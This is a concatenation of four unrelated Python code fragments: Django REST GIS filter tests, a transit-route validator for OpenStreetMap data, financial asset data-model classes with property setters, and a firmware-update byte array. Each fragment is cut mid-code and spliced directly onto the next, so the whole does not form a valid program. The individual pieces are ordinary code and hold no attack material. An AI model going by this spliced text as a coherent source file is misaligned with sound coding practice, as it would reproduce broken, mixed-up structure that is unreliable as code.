], [ -122.51026153564452, 37.76447260365713 ], [ -122.45309829711913, 37.76677954095475 ], [ -122.45481491088867, 37.77424266859531 ], [ -122.5111198425293, 37.77125750792944 ] ] ] }""" self.ggpark_geom = GEOSGeometry(ggpark_geojson) def test_inBBOXFilter_filtering(self): """ Checks that the inBBOXFilter returns only objects strictly contained in the bounding box given by the in_bbox URL parameter """ self.assertEqual(Location.objects.count(), 0) # Bounding box xmin = 0 ymin = 0 xmax = 10 ymax = 10 url_params = '?in_bbox=%d,%d,%d,%d&format=json' % (xmin, ymin, xmax, ymax) # Square with bottom left at (1,1), top right at (9,9) isContained = Location() isContained.name = 'isContained' isContained.geometry = Polygon(((1, 1), (9, 1), (9, 9), (1, 9), (1, 1))) isContained.save() isEqualToBounds = Location() isEqualToBounds.name = 'isEqualToBounds' isEqualToBounds.geometry = Polygon(((0, 0), (10, 0), (10, 10), (0, 10), (0, 0))) isEqualToBounds.save() # Rectangle with bottom left at (-1,1), top right at (5,5) overlaps = Location() overlaps.name = 'overlaps' overlaps.geometry = Polygon(((-1, 1), (5, 1), (5, 5), (-1, 5), (-1, 1))) overlaps.save() # Rectangle with bottom left at (-3,-3), top right at (-1,2) nonIntersecting = Location() nonIntersecting.name = 'nonIntersecting' nonIntersecting.geometry = Polygon( ((-3, -3), (-1, -3), (-1, 2), (-3, 2), (-3, -3)) ) nonIntersecting.save() # Make sure we only get back the ones strictly contained in the bounding box response = self.client.get( self.location_contained_in_bbox_list_url + url_params ) self.assertEqual(len(response.data['features']), 2) for result in response.data['features']: self.assertEqual( result['properties']['name'] in ('isContained', 'isEqualToBounds'), True ) # Make sure we get overlapping results for the view which allows bounding box overlaps. response = self.client.get(self.location_overlaps_bbox_list_url + url_params) self.assertEqual(len(response.data['features']), 3) for result in response.data['features']: self.assertEqual( result['properties']['name'] in ('isContained', 'isEqualToBounds', 'overlaps'), True, ) @skipIf(has_spatialite, 'Skipped test for spatialite backend: not accurate enough') def test_TileFilter_filtering(self): """ Checks that the TMSTileFilter returns only objects strictly contained in the bounding box given by the tile URL parameter """ self.assertEqual(Location.objects.count(), 0) # Bounding box z = 1 x = 1 y = 0 url_params = '?tile=%d/%d/%d&format=json' % (z, x, y) # Square with bottom left at (1,1), top right at (9,9) isContained = Location() isContained.name = 'isContained' isContained.geometry = Polygon(((1, 1), (9, 1), (9, 9), (1, 9), (1, 1))) isContained.save() isEqualToBounds = Location() isEqualToBounds.name = 'isEqualToBounds' isEqualToBounds.geometry = Polygon( ((0, 0), (0, 85.05113), (180, 85.05113), (180, 0), (0, 0)) ) isEqualToBounds.save() # Rectangle with bottom left at (-1,1), top right at (5,5) overlaps = Location() overlaps.name = 'overlaps' overlaps.geometry = Polygon(((-1, 1), (5, 1), (5, 5), (-1, 5), (-1, 1))) overlaps.save() # Rectangle with bottom left at (-3,-3), top right at (-1,2) nonIntersecting = Location() nonIntersecting.name = 'nonIntersecting' nonIntersecting.geometry = Polygon( ((-3, -3), (-1, -3), (-1, 2), (-3, 2), (-3, -3)) ) nonIntersecting.save() # Make sure we only get back the ones strictly contained in the bounding box response = self.client.get( self.location_contained_in_tile_list_url + url_params ) self.assertEqual(len(response.data['features']), 2) for result in response.data['features']: self.assertEqual( result['properties']['name'] in ('isContained', 'isEqualToBounds'), True ) # Make sure we get overlapping results for the view which allows bounding box overlaps. response = self.client.get(self.location_overlaps_tile_list_url + url_params) self.assertEqual(len(response.data['features']), 3) for result in response.data['features']: self.assertEqual( result['properties']['name'] in ('isContained', 'isEqualToBounds', 'overlaps'), True, ) @skipIf( has_spatialite, 'Skipped test for spatialite backend: missing feature "dwithin"' ) def test_DistanceToPointFilter_filtering(self): """ Checks that the DistanceFilter returns only objects within the given distance of the given geometry defined by the URL parameters """ self.assertEqual(Location.objects.count(), 0) # Filter parameters distance = 5000 # meters point_on_alcatraz = [-122.4222, 37.82667] url_params = '?dist=%0.4f&point=hello&format=json' % (distance,) response = self.client.get( '%s%s' % (self.location_within_distance_of_point_list_url, url_params) ) self.assertEqual(response.status_code, 400) url_params = '?dist=%0.4f&point=%0.4f,%0.4f&format=json' % ( distance, point_on_alcatraz[0], point_on_alcatraz[1], ) treasure_island = Location() treasure_island.name = "Treasure Island" treasure_island.geometry = self.treasure_island_geom treasure_island.full_clean() treasure_island.save() ggpark = Location() ggpark.name = "Golden Gate Park" ggpark.geometry = self.ggpark_geom ggpark.save() # Make sure we only get back the ones within the distance response = self.client.get( '%s%s' % (self.location_within_distance_of_point_list_url, url_params) ) self.assertEqual(len(response.data['features']), 1) for result in response.data['features']: self.assertEqual(result['properties']['name'], treasure_island.name) # Make sure we get back all the ones within the distance distance = 7000 url_params = '?dist=%0.4f&point=%0.4f,%0.4f&format=json' % ( distance, point_on_alcatraz[0], point_on_alcatraz[1], ) response = self.client.get( '%s%s' % (self.location_within_distance_of_point_list_url, url_params) ) self.assertEqual(len(response.data['features']), 2) for result in response.data['features']: self.assertIn( result['properties']['name'], (ggpark.name, treasure_island.name) ) # Make sure we only get back the ones within the distance degrees = 0.05 url_params = '?dist=%0.4f&point=%0.4f,%0.4f&format=json' % ( degrees, point_on_alcatraz[0], point_on_alcatraz[1], ) response = self.client.get( self.location_within_degrees_of_point_list_url + url_params ) self.assertEqual(len(response.data['features']), 1) for result in response.data['features']: self.assertEqual(result['properties']['name'], treasure_island.name) @skipIf( has_spatialite, 'Skipped test for spatialite backend: missing feature "GeometryDistance"', ) @skipIf( not has_geometry_distance, 'Skipped test for Django < 3.0: missing feature "GeometryDistance"', ) def test_DistanceToPointOrderingFilter_filtering(self): """ Checks that the DistanceOrderingFilter returns the objects in the correct order given the geometry defined by the URL parameters """ self.assertEqual(Location.objects.count(), 0) url_params = '?point=hello&format=json' response = self.client.get( '%s%s' % (self.location_order_distance_to_point, url_params) ) self.assertEqual(response.status_code, 400) Location.objects.create( name='Houston', geometry='SRID=4326;POINT (-95.363151 29.763374)' ) Location.objects.create( name='Dallas', geometry='SRID=4326;POINT (-96.801611 32.782057)' ) Location.objects.create( name='Oklahoma City', geometry='SRID=4326;POINT (-97.521157 34.464642)' ) Location.objects.create( name='Wellington', geometry='SRID=4326;POINT (174.783117 -41.315268)' ) Location.objects.create( name='Pueblo', geometry='SRID=4326;POINT (-104.609252 38.255001)' ) Location.objects.create( name='Lawrence', geometry='SRID=4326;POINT (-95.235060 38.971823)' ) Location.objects.create( name='Chicago', geometry='SRID=4326;POINT (-87.650175 41.850385)' ) Location.objects.create( name='Victoria', geometry='SRID=4326;POINT (-123.305196 48.462611)' ) point = [-90, 40] url_params = '?point=%i,%i&format=json' % (point[0], point[1]) response = self.client.get( '%s%s' % (self.location_order_distance_to_point, url_params) ) self.assertEqual(len(response.data['features']), 8) self.assertEqual( [city['properties']['name'] for city in response.data['features']], [ 'Chicago', 'Lawrence', 'Oklahoma City', 'Dallas', 'Houston', 'Pueblo', 'Victoria', 'Wellington', ], ) url_params = '?point=%i,%i&order=desc&format=json' % (point[0], point[1]) response = self.client.get( '%s%s' % (self.location_order_distance_to_point, url_params) ) self.assertEqual(len(response.data['features']), 8) self.assertEqual( [city['properties']['name'] for city in response.data['features']], [ 'Wellington', 'Victoria', 'Pueblo', 'Houston', 'Dallas', 'Oklahoma City', 'Lawrence', 'Chicago', ], ) @skipIf( has_spatialite, 'Skipped test for spatialite backend: missing feature "contains_properly"', ) def test_GeometryField_filtering(self): """Checks that the GeometryField allows sane filtering.""" self.assertEqual(Location.objects.count(), 0) treasure_island = Location() treasure_island.name = "Treasure Island" treasure_island.geometry = self.treasure_island_geom treasure_island.full_clean() treasure_island.save() ggpark = Location() ggpark.name = "Golden Gate Park" ggpark.geometry = self.ggpark_geom ggpark.save() point_inside_ggpark_geojson = """ { "type": "Point", "coordinates": [ -122.49034881591797, 37.76949349270407 ] } """ try: quoted_param = urllib.quote(point_inside_ggpark_geojson) except AttributeError: quoted_param = urllib.parse.quote(point_inside_ggpark_geojson) url_params = "?contains_properly=%s" % (quoted_param,) response = self.client.get( '{0}{1}'.format(self.geojson_contained_in_geometry, url_params) ) self.assertEqual(len(response.data), 1) geometry_response = GEOSGeometry(json.dumps(response.data[0]['geometry'])) self.assertTrue(geometry_response.equals_exact(self.ggpark_geom)) self.assertEqual(response.data[0]['name'], ggpark.name) # try without any param, should return both response = self.client.get(self.geojson_contained_in_geometry) self.assertEqual(len(response.data), 2) def test_inBBOXFilter_filtering_none(self): url_params = '?in_bbox=&format=json' response = self.client.get( self.location_contained_in_bbox_list_url + url_params ) self.assertDictEqual( response.data, {'type': 'FeatureCollection', 'features': []} ) def test_inBBOXFilter_ValueError(self): url_params = '?in_bbox=0&format=json' response = self.client.get( self.location_contained_in_bbox_list_url + url_params ) self.assertEqual( response.data['detail'], 'Invalid bbox string supplied for parameter in_bbox', ) def test_inBBOXFilter_filter_field_none(self): original_value = GeojsonLocationContainedInBBoxList.bbox_filter_field GeojsonLocationContainedInBBoxList.bbox_filter_field = None url_params = '?in_bbox=0,0,0,0&format=json' response = self.client.get( self.location_contained_in_bbox_list_url + url_params ) self.assertDictEqual( response.data, {'type': 'FeatureCollection', 'features': []} ) GeojsonLocationContainedInBBoxList.bbox_filter_field = original_value def test_TileFilter_filtering_none(self): url_params = '?tile=&format=json' response = self.client.get( self.location_contained_in_tile_list_url + url_params ) self.assertEqual(response.data, {'type': 'FeatureCollection', 'features': []}) def test_TileFilter_ValueError(self): url_params = '?tile=1/0&format=json' response = self.client.get( self.location_contained_in_tile_list_url + url_params ) self.assertEqual( response.data['detail'], 'Invalid tile string supplied for parameter tile' ) def test_DistanceToPointFilter_filtering_none(self): url_params = '?dist=5000&point=&format=json' response = self.client.get( '%s%s' % (self.location_within_distance_of_point_list_url, url_params) ) self.assertDictEqual( response.data, {'type': 'FeatureCollection', 'features': []} ) def test_DistanceToPointFilter_filter_field_none(self): original_value = GeojsonLocationWithinDistanceOfPointList.distance_filter_field
not seem a route: {}'.format(relation) ) master_tags = {} if not master else master['tags'] self.city = city self.element = relation self.id = el_id(relation) if 'ref' not in relation['tags'] and 'ref' not in master_tags: city.notice('Missing ref on a route', relation) self.ref = relation['tags'].get( 'ref', master_tags.get('ref', relation['tags'].get('name', None)) ) self.name = relation['tags'].get('name', None) self.mode = relation['tags']['route'] if ( 'colour' not in relation['tags'] and 'colour' not in master_tags and self.mode != 'tram' ): city.notice('Missing colour on a route', relation) try: self.colour = normalize_colour( relation['tags'].get('colour', master_tags.get('colour', None)) ) except ValueError as e: self.colour = None city.warn(str(e), relation) try: self.infill = normalize_colour( relation['tags'].get( 'colour:infill', master_tags.get('colour:infill', None) ) ) except ValueError as e: self.infill = None city.warn(str(e), relation) self.network = Route.get_network(relation) self.interval = Route.get_interval( relation['tags'] ) or Route.get_interval(master_tags) if relation['tags'].get('public_transport:version') == '1': city.warn( 'Public transport version is 1, which means the route ' 'is an unsorted pile of objects', relation, ) self.is_circular = False # self.tracks would be a list of (lon, lat) for the longest stretch. Can be empty tracks, line_nodes = self.build_longest_line(relation) self.tracks = [el_center(city.elements.get(k)) for k in tracks] if ( None in self.tracks ): # usually, extending BBOX for the city is needed self.tracks = [] for n in filter(lambda x: x not in city.elements, tracks): city.warn( 'The dataset is missing the railway tracks node {}'.format( n ), relation, ) break self.stops = [] # List of RouteStop stations = set() # temporary for recording stations seen_stops = False seen_platforms = False repeat_pos = None for m in relation['members']: if 'inactive' in m['role']: continue k = el_id(m) if k in city.stations: st_list = city.stations[k] st = st_list[0] if len(st_list) > 1: city.error( 'Ambiguous station {} in route. Please use stop_position or split ' 'interchange stations'.format(st.name), relation, ) el = city.elements[k] actual_role = RouteStop.get_actual_role( el, m['role'], city.modes ) if actual_role: if m['role'] and actual_role not in m['role']: city.warn( "Wrong role '{}' for {} {}".format( m['role'], actual_role, k ), relation, ) if repeat_pos is None: if not self.stops or st not in stations: stop = RouteStop(st) self.stops.append(stop) stations.add(st) elif self.stops[-1].stoparea.id == st.id: stop = self.stops[-1] else: # We've got a repeat if ( (seen_stops and seen_platforms) or ( actual_role == 'stop' and not seen_platforms ) or ( actual_role == 'platform' and not seen_stops ) ): # Circular route! stop = RouteStop(st) self.stops.append(stop) stations.add(st) else: repeat_pos = 0 if repeat_pos is not None: if repeat_pos >= len(self.stops): continue # Check that the type matches if (actual_role == 'stop' and seen_stops) or ( actual_role == 'platform' and seen_platforms ): city.error( 'Found an out-of-place {}: "{}" ({})'.format( actual_role, el['tags'].get('name', ''), k ), relation, ) continue # Find the matching stop starting with index repeat_pos while ( repeat_pos < len(self.stops) and self.stops[repeat_pos].stoparea.id != st.id ): repeat_pos += 1 if repeat_pos >= len(self.stops): city.error( 'Incorrect order of {}s at {}'.format( actual_role, k ), relation, ) continue stop = self.stops[repeat_pos] stop.add(m, relation, city) if repeat_pos is None: seen_stops |= stop.seen_stop or stop.seen_station seen_platforms |= stop.seen_platform if StopArea.is_stop(el): if k not in line_nodes: city.warn( 'Stop position "{}" ({}) is not on tracks'.format( el['tags'].get('name', ''), k ), relation, ) continue if k not in city.elements: if 'stop' in m['role'] or 'platform' in m['role']: raise CriticalValidationError( '{} {} {} for route relation {} is not in the dataset'.format( m['role'], m['type'], m['ref'], relation['id'] ) ) continue el = city.elements[k] if 'tags' not in el: city.error('Untagged object {} in a route'.format(k), relation) continue is_under_construction = False for ck in CONSTRUCTION_KEYS: if ck in el['tags']: city.warn( 'Under construction {} {} in route. Consider ' 'setting \'inactive\' role or removing construction attributes'.format( m['role'] or 'feature', k ), relation, ) is_under_construction = True break if is_under_construction: continue if Station.is_station(el, city.modes): # A station may be not included into this route due to previous # 'stop area has multiple stations' error. No other error message is needed. pass elif el['tags'].get('railway') in ('station', 'halt'): city.error( 'Missing station={} on a {}'.format(self.mode, m['role']), el, ) else: actual_role = RouteStop.get_actual_role( el, m['role'], city.modes ) if actual_role: city.error( '{} {} {} is not connected to a station in route'.format( actual_role, m['type'], m['ref'] ), relation, ) elif not StopArea.is_track(el): city.warn( 'Unknown member type for {} {} in route'.format( m['type'], m['ref'] ), relation, ) if len(self.stops) > 1: self.is_circular = ( self.stops[0].stoparea == self.stops[-1].stoparea ) stops_on_longest_line = self.project_stops_on_line() self.check_and_recover_stops_order(stops_on_longest_line) self.calculate_distances() def check_stops_order_by_angle(self): disorder_warnings = [] disorder_errors = [] for si in range(len(self.stops) - 2): angle = angle_between( self.stops[si].stop, self.stops[si + 1].stop, self.stops[si + 2].stop, ) if angle < ALLOWED_ANGLE_BETWEEN_STOPS: msg = 'Angle between stops around "{}" is too narrow, {} degrees'.format( self.stops[si + 1].stoparea.name, angle ) if angle < DISALLOWED_ANGLE_BETWEEN_STOPS: disorder_errors.append(msg) else: disorder_warnings.append(msg) return disorder_warnings, disorder_errors def check_stops_order_on_tracks_direct(self, stop_sequence): """Checks stops order on tracks, following stop_sequence in direct order only. :param stop_sequence: list of RouteStop that belong to the longest contiguous sequence of tracks in a route. :return: error message on the first order violation or None. """ def make_assertion_error_msg(route_stop, error_type): return ( "stop_area {} '{}' has {} 'positions_on_rails' " "attribute in route {}".format( route_stop.stoparea.id, route_stop.stoparea.name, "no" if error_type == 1 else "empty", self.id, ) ) allowed_order_violations = 1 if self.is_circular else 0 max_position_on_rails = -1 for route_stop in stop_sequence: assert hasattr( route_stop, 'positions_on_rails' ), make_assertion_error_msg(route_stop, error_type=1) positions_on_rails = route_stop.positions_on_rails assert positions_on_rails, make_assertion_error_msg( route_stop, error_type=2 ) suitable_occurrence = 0 while ( suitable_occurrence < len(positions_on_rails) and positions_on_rails[suitable_occurrence] < max_position_on_rails ): suitable_occurrence += 1 if suitable_occurrence == len(positions_on_rails): if allowed_order_violations > 0: suitable_occurrence -= 1 allowed_order_violations -= 1 else: return 'Stops on tracks are unordered near "{}" {}'.format( route_stop.stoparea.name, route_stop.stop ) max_position_on_rails = positions_on_rails[suitable_occurrence] def check_stops_order_on_tracks(self, stop_sequence): """Checks stops order on tracks, trying direct and reversed order of stops in the stop_sequence. :param stop_sequence: list of RouteStop that belong to the longest contiguous sequence of tracks in a route. :return: error message on the first order violation or None. """ error_message = self.check_stops_order_on_tracks_direct(stop_sequence) if error_message: error_message_reversed = self.check_stops_order_on_tracks_direct( reversed(stop_sequence) ) if error_message_reversed is None: error_message = None self.city.warn( 'Tracks seem to go in the opposite direction to stops', self.element, ) return error_message def check_stops_order(self, stops_on_longest_line): ( angle_disorder_warnings, angle_disorder_errors, ) = self.check_stops_order_by_angle() disorder_on_tracks_error = self.check_stops_order_on_tracks( stops_on_longest_line ) disorder_warnings = angle_disorder_warnings disorder_errors = angle_disorder_errors if disorder_on_tracks_error: disorder_errors.append(disorder_on_tracks_error) return disorder_warnings, disorder_errors def check_and_recover_stops_order(self, stops_on_longest_line): disorder_warnings, disorder_errors = self.check_stops_order( stops_on_longest_line ) if disorder_warnings or disorder_errors: resort_success = False if self.city.recovery_data: resort_success = self.try_resort_stops() if resort_success: for msg in disorder_warnings: self.city.notice(msg, self.element) for msg in disorder_errors: self.city.warn( "Fixed with recovery data: " + msg, self.element ) if not resort_success: for msg in disorder_warnings: self.city.notice(msg, self.element) for msg in disorder_errors: self.city.error(msg, self.element) def try_resort_stops(self): """Precondition: self.city.recovery_data is not None. Return success of station order recovering.""" self_stops = {} # station name => RouteStop for stop in self.stops: station = stop.stoparea.station stop_name = station.name if stop_name == '?' and station.int_name: stop_name = station.int_name # We won't programmatically recover routes with repeating stations: # such cases are rare and deserves manual verification if stop_name in self_stops: return False self_stops[stop_name] = stop route_id = (self.colour, self.ref) if route_id not in self.city.recovery_data: return False stop_names = list(self_stops.keys()) suitable_itineraries = [] for itinerary in self.city.recovery_data[route_id]: itinerary_stop_names = [ stop['name'] for stop in itinerary['stations'] ] if not ( len(stop_names) == len(itinerary_stop_names) and sorted(stop_names) == sorted(itinerary_stop_names) ): continue big_station_displacement = False for it_stop in itinerary['stations']: name = it_stop['name'] it_stop_center = it_stop['center'] self_stop_center = self_stops[name].stoparea.station.center if ( distance(it_stop_center, self_stop_center) > DISPLACEMENT_TOLERANCE ): big_station_displacement = True break if not big_station_displacement: suitable_itineraries.append(itinerary) if len(suitable_itineraries) == 0: return False elif len(suitable_itineraries) == 1: matching_itinerary = suitable_itineraries[0] else: from_tag = self.element['tags'].get('from') to_tag = self.element['tags'].get('to') if not from_tag and not to_tag: return False matching_itineraries = [ itin for itin in suitable_itineraries if from_tag and itin['from'] == from_tag or to_tag and itin['to'] == to_tag ] if len(matching_itineraries) != 1: return False matching_itinerary = matching_itineraries[0] self.stops = [ self_stops[stop['name']] for stop in matching_itinerary['stations'] ] return True def __len__(self): return len(self.stops)
asset information.""" return self.__strategy_description @strategy_description.setter def strategy_description(self, value: str): self._property_changed('strategy_description') self.__strategy_description = value @property def targeted_gross_exposure(self) -> NumberRange: """Value of a fund's long positions plus short positions, expressed in percentage terms. Only viewable after having been granted additional access to asset information.""" return self.__targeted_gross_exposure @targeted_gross_exposure.setter def targeted_gross_exposure(self, value: NumberRange): self._property_changed('targeted_gross_exposure') self.__targeted_gross_exposure = value @property def targeted_net_exposure(self) -> NumberRange: """Value of a fund's long positions minus short positions, expressed in percentage terms. Only viewable after having been granted additional access to asset information.""" return self.__targeted_net_exposure @targeted_net_exposure.setter def targeted_net_exposure(self, value: NumberRange): self._property_changed('targeted_net_exposure') self.__targeted_net_exposure = value @property def targeted_num_of_positions_short(self) -> NumberRange: """Range of positions the fund typically holds on the short side of its portfolio. Only viewable after having been granted additional access to asset information.""" return self.__targeted_num_of_positions_short @targeted_num_of_positions_short.setter def targeted_num_of_positions_short(self, value: NumberRange): self._property_changed('targeted_num_of_positions_short') self.__targeted_num_of_positions_short = value @property def targeted_num_of_positions_long(self) -> NumberRange: """Range of positions the fund typically holds on the long side of its portfolio. Only viewable after having been granted additional access to asset information.""" return self.__targeted_num_of_positions_long @targeted_num_of_positions_long.setter def targeted_num_of_positions_long(self, value: NumberRange): self._property_changed('targeted_num_of_positions_long') self.__targeted_num_of_positions_long = value @property def turnover(self) -> str: """Rate at which a fund replaces its investment holdings. Only viewable after having been granted additional access to asset information.""" return self.__turnover @turnover.setter def turnover(self, value: str): self._property_changed('turnover') self.__turnover = value @property def vehicle_type(self) -> str: """Type of investment vehicle. Only viewable after having been granted additional access to asset information.""" return self.__vehicle_type @vehicle_type.setter def vehicle_type(self, value: str): self._property_changed('vehicle_type') self.__vehicle_type = value @property def last_returns_date(self) -> datetime.date: """ISO 8601-formatted date""" return self.__last_returns_date @last_returns_date.setter def last_returns_date(self, value: datetime.date): self._property_changed('last_returns_date') self.__last_returns_date = value class SecuritiesLendingLoan(Base): """Parameters specific to a securities lending loan""" @camel_case_translate def __init__( self, asset_id: str, fund_id: str, lender_id: str, borrower_id: str, loan_status: str = None, settlement_status: str = None, collateral_type: str = None, loan_currency: Union[Currency, str] = None, adjustment_ind: bool = None, country_of_issue: str = None, input_date: datetime.date = None, effective_date: datetime.date = None, security_settle_date: datetime.date = None, cash_settle_date: datetime.date = None, term_date: datetime.date = None, return_date: datetime.date = None, name: str = None ): super().__init__() self.asset_id = asset_id self.fund_id = fund_id self.lender_id = lender_id self.borrower_id = borrower_id self.loan_status = loan_status self.settlement_status = settlement_status self.collateral_type = collateral_type self.loan_currency = loan_currency self.adjustment_ind = adjustment_ind self.country_of_issue = country_of_issue self.input_date = input_date self.effective_date = effective_date self.security_settle_date = security_settle_date self.cash_settle_date = cash_settle_date self.term_date = term_date self.return_date = return_date self.name = name @property def asset_id(self) -> str: """Id of the security being lent as part of this loan. This Id should tie to an Asset""" return self.__asset_id @asset_id.setter def asset_id(self, value: str): self._property_changed('asset_id') self.__asset_id = value @property def fund_id(self) -> str: """Id of the fund from which the loan is booked. This Id should tie to an Asset""" return self.__fund_id @fund_id.setter def fund_id(self, value: str): self._property_changed('fund_id') self.__fund_id = value @property def lender_id(self) -> str: """Id of the counterpart lending the security. This Id should tie to a Company""" return self.__lender_id @lender_id.setter def lender_id(self, value: str): self._property_changed('lender_id') self.__lender_id = value @property def borrower_id(self) -> str: """Id of the counterpart borrowing the security. This Id should tie to a Company""" return self.__borrower_id @borrower_id.setter def borrower_id(self, value: str): self._property_changed('borrower_id') self.__borrower_id = value @property def loan_status(self) -> str: """The current state of the loan""" return self.__loan_status @loan_status.setter def loan_status(self, value: str): self._property_changed('loan_status') self.__loan_status = value @property def settlement_status(self) -> str: """State of the underlying components of the loan.""" return self.__settlement_status @settlement_status.setter def settlement_status(self, value: str): self._property_changed('settlement_status') self.__settlement_status = value @property def collateral_type(self) -> str: """Type of collateral used to collateralize the loan""" return self.__collateral_type @collateral_type.setter def collateral_type(self, value: str): self._property_changed('collateral_type') self.__collateral_type = value @property def loan_currency(self) -> Union[Currency, str]: """Currency in which the loan value is represented""" return self.__loan_currency @loan_currency.setter def loan_currency(self, value: Union[Currency, str]): self._property_changed('loan_currency') self.__loan_currency = get_enum_value(Currency, value) @property def adjustment_ind(self) -> bool: """Defines whether or not this contract is for the purpose of a month end loan adjustment.""" return self.__adjustment_ind @adjustment_ind.setter def adjustment_ind(self, value: bool): self._property_changed('adjustment_ind') self.__adjustment_ind = value @property def country_of_issue(self) -> str: """The country code (ISO 3166) of the underlying security""" return self.__country_of_issue @country_of_issue.setter def country_of_issue(self, value: str): self._property_changed('country_of_issue') self.__country_of_issue = value @property def input_date(self) -> datetime.date: """Date that the loan is booked""" return self.__input_date @input_date.setter def input_date(self, value: datetime.date): self._property_changed('input_date') self.__input_date = value @property def effective_date(self) -> datetime.date: """Date of the trade""" return self.__effective_date @effective_date.setter def effective_date(self, value: datetime.date): self._property_changed('effective_date') self.__effective_date = value @property def security_settle_date(self) -> datetime.date: """Date that the loaned securities settled""" return self.__security_settle_date @security_settle_date.setter def security_settle_date(self, value: datetime.date): self._property_changed('security_settle_date') self.__security_settle_date = value @property def cash_settle_date(self) -> datetime.date: """Date of the cash collateral settled""" return self.__cash_settle_date @cash_settle_date.setter def cash_settle_date(self, value: datetime.date): self._property_changed('cash_settle_date') self.__cash_settle_date = value @property def term_date(self) -> datetime.date: """Date the dividend is paid for dividend based loans""" return self.__term_date @term_date.setter def term_date(self, value: datetime.date): self._property_changed('term_date') self.__term_date = value @property def return_date(self) -> datetime.date: """Date the loan is returned""" return self.__return_date @return_date.setter def return_date(self, value: datetime.date): self._property_changed('return_date') self.__return_date = value class ShareClassParameters(Base): """Attributes specific to share class assets""" @camel_case_translate def __init__( self, active_liquidity_fee: float = None, additional_provisions: str = None, benchmark: Benchmark = None, class_fees: float = None, class_type: str = None, early_redemption_fee: float = None, expense_ratio_gross: float = None, expense_ratio_net: float = None, share_class_type: str = None, gate: float = None, gate_type: str = None, hurdle: float = None, hurdle_type: str = None, investment_manager: str = None, investment_type: str = None, institutional_share_class: bool = None, lockup: float = None, lockup_type: str = None, management_fee: float = None, minimum_subscription: float = None, name: str = None, number_of_shares: float = None, performance_fee: float = None, redemption_notice_period: float = None, redemption_period: str = None, share_class_currency: str = None, side_pocket: str = None, status: str = None, sub_category: str = None, term_type: str = None ): super().__init__() self.active_liquidity_fee = active_liquidity_fee self.additional_provisions = additional_provisions self.benchmark = benchmark self.class_fees = class_fees self.class_type = class_type self.early_redemption_fee = early_redemption_fee self.expense_ratio_gross = expense_ratio_gross self.expense_ratio_net = expense_ratio_net self.share_class_type = share_class_type self.gate = gate self.gate_type = gate_type self.hurdle = hurdle self.hurdle_type = hurdle_type self.investment_manager = investment_manager self.investment_type = investment_type self.institutional_share_class = institutional_share_class self.lockup = lockup self.lockup_type = lockup_type self.management_fee = management_fee self.minimum_subscription = minimum_subscription self.name = name self.number_of_shares = number_of_shares self.performance_fee = performance_fee self.redemption_notice_period = redemption_notice_period self.redemption_period = redemption_period self.share_class_currency = share_class_currency self.side_pocket = side_pocket self.status = status self.sub_category = sub_category self.term_type = term_type @property def active_liquidity_fee(self) -> float: """Denotes percent active liquidity fee associated with this fund""" return self.__active_liquidity_fee @active_liquidity_fee.setter def active_liquidity_fee(self, value: float): self._property_changed('active_liquidity_fee') self.__active_liquidity_fee = value @property def additional_provisions(self) -> str: """Additional details that are relevant to the share class that not captured by the other fields""" return self.__additional_provisions @additional_provisions.setter def additional_provisions(self, value: str): self._property_changed('additional_provisions') self.__additional_provisions = value @property def benchmark(self) -> Benchmark: """Reference rate that can based on an absolute value or absolute value + index""" return self.__benchmark @benchmark.setter def benchmark(self, value: Benchmark): self._property_changed('benchmark') self.__benchmark = value @property def class_fees(self) -> float: """Annual cost of investing in specific shareclass, expressed in basis points""" return self.__class_fees @class_fees.setter def class_fees(self, value: float): self._property_changed('class_fees') self.__class_fees = value @property def class_type(self) -> str: """For example: B, C, Offshore, Offshore - A, etc""" return self.__class_type @class_type.setter def class_type(self, value: str): self._property_changed('class_type') self.__class_type = value @property def early_redemption_fee(self) -> float: """Fee an investor pays to redeem before the expiry of a soft lock-up""" return self.__early_redemption_fee @early_redemption_fee.setter def early_redemption_fee(self, value: float): self._property_changed('early_redemption_fee') self.__early_redemption_fee = value @property def expense_ratio_gross(self) -> float: """Gross expense ratio of the shareclass""" return self.__expense_ratio_gross @expense_ratio_gross.setter def expense_ratio_gross(self, value: float): self._property_changed('expense_ratio_gross') self.__expense_ratio_gross = value @property def expense_ratio_net(self) -> float: """Net expense ratio of the shareclass""" return self.__expense_ratio_net @expense_ratio_net.setter def expense_ratio_net(self, value: float): self._property_changed('expense_ratio_net') self.__expense_ratio_net = value @property def share_class_type(self) -> str: """Must be Money Market,
FW_IV = [0x42,0xea,0xff,0xf7,0x7c,0xc2,0x4f,0x2b,0x9b,0xc9,0x9d,0xe0,0x5c,0xba] # FwVersion: 1.1.18;p:HillstarV01;DSP:ID9000r2151;i:B;f:22500;nMsg;s:Rel_1r1223:MO;c:JKS;t:2014/05/20 15:37:05; FW_VERSION = [0x31,0x2e,0x31,0x2e,0x31,0x38,0x3b,0x70,0x3a,0x48,0x69,0x6c,0x6c,0x73,0x74,0x61, 0x72,0x56,0x30,0x31,0x3b,0x44,0x53,0x50,0x3a,0x49,0x44,0x39,0x30,0x30,0x30,0x72, 0x32,0x31,0x35,0x31,0x3b,0x69,0x3a,0x42,0x3b,0x66,0x3a,0x32,0x32,0x35,0x30,0x30, 0x3b,0x6e,0x4d,0x73,0x67,0x3b,0x73,0x3a,0x52,0x65,0x6c,0x5f,0x31,0x72,0x31,0x32, 0x32,0x33,0x3a,0x4d,0x4f,0x3b,0x63,0x3a,0x4a,0x4b,0x53,0x3b,0x74,0x3a,0x32,0x30, 0x31,0x34,0x2f,0x30,0x35,0x2f,0x32,0x30,0x20,0x31,0x35,0x3a,0x33,0x37,0x3a,0x30, 0x35,0x3b,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0, 0x0,0x0,0x0,0x0,0xe1,0xea,0x0,0x0] FW_UPDATE_DATA = [ [ # Record 0: Address = 0x1000, Length = 128 0x1000,0x80, 0x3,0x24,0x87,0xa4,0x18,0xc8,0x7e,0xed,0xcb,0x62,0x78,0x20,0x4d,0x48,0x4c,0x5d, 0xb7,0x0,0x1,0x2b,0x83,0xb2,0xdc,0x14,0xd9,0xb7,0x66,0xd6,0xbd,0x9d,0x60,0x97, 0x64,0x56,0x89,0xd1,0xa2,0xb2,0x18,0xed,0x79,0x7a,0x59,0x60,0x4b,0xa4,0xa5,0xc9, 0x24,0x75,0xf3,0xa4,0xe4,0x12,0xda,0xa4,0x3f,0xa1,0xf6,0x92,0x82,0x8b,0x80,0x4, 0xe1,0x4f,0x91,0xc4,0xc4,0x91,0x38,0x30,0xfe,0xd2,0xd9,0x4a,0xbe,0x4e,0xa1,0x73, 